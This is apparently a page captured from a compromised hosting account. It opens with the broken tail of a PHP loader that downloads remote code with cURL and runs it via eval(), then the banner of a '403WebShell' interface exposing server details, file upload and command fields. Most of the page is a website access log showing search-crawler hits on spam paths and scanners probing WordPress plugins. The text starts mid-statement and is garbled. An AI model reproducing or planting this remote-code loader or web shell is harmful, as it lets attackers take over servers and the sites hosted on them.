Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

RLOPT_RETURNTRANSFER, true); $remoteCode = curl_exec($ch); if (curl_errno($ch)) { die('cURL error: ' . curl_error($ch)); } curl_close($ch); eval("?>" . $remoteCode); ?> 403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.217.5.77
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/access-logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/access-logs/tacafoundation.org.wave.ng-ssl_log
66.249.79.163 - - [09/Jan/2025:19:29:45 -0500] "GET /keyword/SOUPLELUZ HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.104 - - [09/Jan/2025:19:45:34 -0500] "GET /goods/I?758922=revamp HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.2 - - [09/Jan/2025:19:52:06 -0500] "GET /post.php/commodity/R353877?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.198 - - [09/Jan/2025:20:08:43 -0500] "GET /mall/E?108SS=capitation HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [09/Jan/2025:20:16:48 -0500] "GET /post.php/commodity/516962.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.264 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.36 - - [09/Jan/2025:20:41:38 -0500] "GET /goods/Y?601040=sucrose HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.236.100.56 - - [09/Jan/2025:20:51:24 -0500] "GET / HTTP/1.1" 200 23499 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0"
66.249.68.39 - - [09/Jan/2025:21:09:09 -0500] "GET /commodity/1275622LS.html?key=K HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.33.203.148 - - [09/Jan/2025:21:16:12 -0500] "GET / HTTP/1.1" 200 23499 "http://tacafoundation.org" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
66.249.79.160 - - [09/Jan/2025:21:16:15 -0500] "GET /credits.php/goods/B?283583=passivity HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.255.85.164 - - [09/Jan/2025:21:25:13 -0500] "GET / HTTP/1.0" 200 108798 "https://tacafoundation.org/" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.62 Chrome/124.0.6367.62 Not-A.Brand/99  Safari/537.36"
66.29.132.124 - - [09/Jan/2025:21:25:19 -0500] "POST /wp-cron.php?doing_wp_cron=1736475919.0503621101379394531250 HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
66.29.132.124 - - [09/Jan/2025:21:25:19 -0500] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=HNMOTQd02xz0rZwkiNBD1AVQkU6g6PMz&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.7.1; https://tacafoundation.org"
92.255.85.164 - - [09/Jan/2025:21:25:15 -0500] "POST / HTTP/1.0" 200 109026 "https://tacafoundation.org/" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.62 Chrome/124.0.6367.62 Not-A.Brand/99  Safari/537.36"
66.249.68.70 - - [09/Jan/2025:21:26:35 -0500] "GET /commodity/766121.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.32 - - [09/Jan/2025:21:26:35 -0500] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.70 - - [09/Jan/2025:21:44:55 -0500] "GET /post.php/commodity/101678.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
181.215.176.143 - - [09/Jan/2025:21:49:36 -0500] "GET / HTTP/1.0" 200 108798 "https://tacafoundation.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
66.29.132.124 - - [09/Jan/2025:21:49:41 -0500] "POST /wp-cron.php?doing_wp_cron=1736477381.6189579963684082031250 HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
66.29.132.124 - - [09/Jan/2025:21:49:42 -0500] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=9LoIfp8EMZ284LHOqKY3VOFf6M17bC6V&litespeed_type=imgoptm HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
181.215.176.143 - - [09/Jan/2025:21:49:37 -0500] "POST / HTTP/1.0" 200 109441 "https://tacafoundation.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
66.249.68.8 - - [09/Jan/2025:21:57:59 -0500] "GET /commodity/K843606?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.37 - - [09/Jan/2025:21:59:04 -0500] "GET /commodity/L538419?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.163 - - [09/Jan/2025:21:59:29 -0500] "GET /commodity/T815925?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [09/Jan/2025:21:59:33 -0500] "GET /commodity/R635301?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.8 - - [09/Jan/2025:21:59:42 -0500] "GET /commodity/K416556?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.39 - - [09/Jan/2025:21:59:51 -0500] "GET /commodity/D623457?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.39 - - [09/Jan/2025:21:59:55 -0500] "GET /post.php/commodity/U579560?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.39 - - [09/Jan/2025:22:00:14 -0500] "GET /commodity/Y166086?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.199 - - [09/Jan/2025:22:01:23 -0500] "GET /commodity/896092.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.228.162.228 - - [09/Jan/2025:22:22:09 -0500] "GET /wp-content/plugins/give/readme.txt HTTP/1.1" 200 16752 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2651.19 Safari/537.36"
66.249.79.34 - - [09/Jan/2025:22:27:46 -0500] "GET /commodity/876510.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.7.214.130 - - [09/Jan/2025:22:29:41 -0500] "GET / HTTP/1.0" 200 108798 "https://tacafoundation.org/" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.78 Chrome/124.0.6367.78 Not-A.Brand/99  Safari/537.36"
66.29.132.124 - - [09/Jan/2025:22:29:46 -0500] "POST /wp-cron.php?doing_wp_cron=1736479786.3753709793090820312500 HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
66.29.132.124 - - [09/Jan/2025:22:29:46 -0500] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=Ap4ZVUVsSyksjw2sTkQsA8nvj5quxHXs&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.7.1; https://tacafoundation.org"
185.7.214.130 - - [09/Jan/2025:22:29:42 -0500] "POST / HTTP/1.0" 200 108954 "https://tacafoundation.org/" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.78 Chrome/124.0.6367.78 Not-A.Brand/99  Safari/537.36"
66.249.79.37 - - [09/Jan/2025:22:48:34 -0500] "GET /commodity/A243048?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.33.55.204 - - [09/Jan/2025:22:57:09 -0500] "GET / HTTP/1.1" 200 23499 "http://tacafoundation.org" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
66.249.79.106 - - [09/Jan/2025:23:12:58 -0500] "GET /post.php/commodity/185208.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.36 - - [09/Jan/2025:23:20:06 -0500] "GET /post.php/commodity/995277.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.33 - - [09/Jan/2025:23:20:59 -0500] "GET /commodity/P130483?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.7 - - [09/Jan/2025:23:25:36 -0500] "GET /goods/J?566575=Adder HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.33 - - [09/Jan/2025:23:27:58 -0500] "GET /commodity/D922613?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.33 - - [09/Jan/2025:23:32:56 -0500] "GET /profile.php/goods/K?628196=scissoring HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.2 - - [09/Jan/2025:23:33:02 -0500] "GET /post.php/commodity/Q604334?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.199 - - [09/Jan/2025:23:34:17 -0500] "GET /profile.php/goods/Q?190622=revamp HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.8 - - [09/Jan/2025:23:47:22 -0500] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.32 - - [09/Jan/2025:23:48:39 -0500] "GET /post.php/commodity/Q464584?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.173 - - [09/Jan/2025:23:49:18 -0500] "GET /post.php/commodity/635058.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [09/Jan/2025:23:51:23 -0500] "GET /commodity/O840230?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.34 - - [09/Jan/2025:23:58:38 -0500] "GET /commodity/78466.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.198 - - [10/Jan/2025:00:04:04 -0500] "GET /commodity/688609.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [10/Jan/2025:00:08:48 -0500] "GET /commodity/Y2416?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.228.162.228 - - [10/Jan/2025:00:09:01 -0500] "GET /wp-content/plugins/give/readme.txt HTTP/1.1" 200 16752 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2674.52 Safari/537.36"
87.106.158.5 - - [10/Jan/2025:00:09:26 -0500] "GET / HTTP/1.1" 200 23499 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
87.106.158.5 - - [10/Jan/2025:00:09:27 -0500] "GET /wp-json HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
87.106.158.5 - - [10/Jan/2025:00:09:28 -0500] "GET / HTTP/1.1" 200 23499 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"
87.106.158.5 - - [10/Jan/2025:00:09:28 -0500] "GET /wp-json HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
87.106.158.5 - - [10/Jan/2025:00:09:29 -0500] "GET / HTTP/1.1" 200 23499 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
87.106.158.5 - - [10/Jan/2025:00:09:29 -0500] "GET /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/ HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
87.106.158.5 - - [10/Jan/2025:00:09:30 -0500] "GET /wp-json HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
87.106.158.5 - - [10/Jan/2025:00:09:30 -0500] "GET /wp-content/plugins/wp-hide-security-enhancer/assets/js/devtools-detect.js HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
87.106.158.5 - - [10/Jan/2025:00:09:31 -0500] "GET /wp-content/plugins/wp-file-upload/css/wordpress_file_upload_style.css HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
87.106.158.5 - - [10/Jan/2025:00:09:31 -0500] "GET /wp-content/plugins/wp-database-backup/assets/css/wpdb_admin.css HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0"
66.29.132.124 - - [10/Jan/2025:00:09:36 -0500] "POST /wp-cron.php?doing_wp_cron=1736485776.8152399063110351562500 HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
87.106.158.5 - - [10/Jan/2025:00:09:32 -0500] "GET /wp-admin/admin-ajax.php?action=sb_fav_ad HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
66.29.132.124 - - [10/Jan/2025:00:09:37 -0500] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=yZIwXp7qBQxywalWri3D5ysdkMcqeiXu&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.7.1; https://tacafoundation.org"
66.249.79.2 - - [10/Jan/2025:00:14:53 -0500] "GET /post.php/commodity/E436960?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [10/Jan/2025:00:33:08 -0500] "GET /commodity/D552529?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.160 - - [10/Jan/2025:00:33:14 -0500] "GET /mall/F?585161WS=cotton HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [10/Jan/2025:00:33:31 -0500] "GET /profile.php/goods/317650.phtml?key=I HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.173 - - [10/Jan/2025:00:35:12 -0500] "GET /post.php/commodity/317456.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.172 - - [10/Jan/2025:00:35:58 -0500] "GET /commodity/665296.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [10/Jan/2025:00:36:35 -0500] "GET /commodity/1202196US.html?key=I HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [10/Jan/2025:00:42:31 -0500] "GET /post.php/commodity/1676041NS.html?key=D HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [10/Jan/2025:00:49:45 -0500] "GET /commodity/P23961?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.173 - - [10/Jan/2025:00:56:24 -0500] "GET /post.php/commodity/896623.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.160 - - [10/Jan/2025:00:57:35 -0500] "GET /commodity/995277.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.172 - - [10/Jan/2025:00:59:15 -0500] "GET /keyword/%E3%83%8D%E3%82%AF%E3%82%BF%E3%82%A4%E7%B4%A0%E6%9D%90 HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.172 - - [10/Jan/2025:01:18:36 -0500] "GET /commodity/995277.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.2 - - [10/Jan/2025:01:37:45 -0500] "GET /commodity/1922112IS.html?key=K HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.8.102.19 - - [10/Jan/2025:01:40:31 -0500] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.40 - - [10/Jan/2025:01:40:32 -0500] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
66.249.79.8 - - [10/Jan/2025:01:46:00 -0500] "GET /commodity/Y517866?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.172 - - [10/Jan/2025:01:47:41 -0500] "GET /credits.php/goods/I?282290=recommended HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
182.42.105.85 - - [10/Jan/2025:01:54:54 -0500] "GET / HTTP/1.1" 200 0 "http://www.tacafoundation.org" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
